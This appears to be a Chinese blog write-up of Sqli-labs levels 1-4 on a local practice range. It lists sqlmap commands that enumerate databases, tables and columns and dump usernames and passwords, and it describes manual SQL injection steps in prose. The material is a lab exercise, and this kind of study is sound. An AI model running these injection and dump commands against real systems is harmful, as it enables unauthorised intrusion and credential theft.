zoukankan      html  css  js  c++  java
  • Sqli_labs第1-4关&&sqlmap.py的初步使用

    打开搭建好的靶场

    运行sqlmap.py

    找到自己sqlmap的路径,我这里是C:UsersMachenikeDesktopsqlmap-master

    所以打开cmd输入cd C:UsersMachenikeDesktopsqlmap-master

    再输入sqlmap.py

    输入python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1

    输入python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 –current-db查下当前数据库

    输入python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security –tables 查看security数据库的表

    输入python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security -T users –columns查看字段    

    输入python sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security -T users -C password,username –dump 搞到用户和密码

    再去尝试了下第二关直接输入python sqlmap.py -u http://127.0.0.1/sql/Less-2/?id=1 -D security -T users -C password,username –dump

     

     

    自己再去老老实实的手工注入了下

    判断了下注入点,直接加单引号了,发现显示了错误 试了下order by 发现查不出

    再试了下and 1=1 和 and 1=2 发现 and 1=2 就有变化了,那这次就是整形注入了

    再试了下order by 发现查得出

    然就我就union了

    先直接爆了

    然后自己再老老实实去熟练一下

    再搞了下第三关发现都没用啊,之前的判断注入,然后看到有括号了,试一试,可以

    直接搞完第四题吧

    发现是双引号吐了,憨逼的我以为双引号是两个单引号合在一起…hh

    就不一步一步来了,直接搞吧

    太晚了,想睡觉了

  • 相关阅读:
    少写代码帮你模块化方法 & 运动框架 & 简化轮播图
    JQ
    弹框&可用于判断
    移动端内容区域滚动做法总结
    数组这回事
    Bootstrap & 响应式
    谈谈this对象
    模态框中水平垂直居的问题
    图片的懒加载问题
    js中运动框架的封装
  • 原文地址:https://www.cnblogs.com/cxl862002755/p/13128472.html
Copyright © 2011-2022 走看看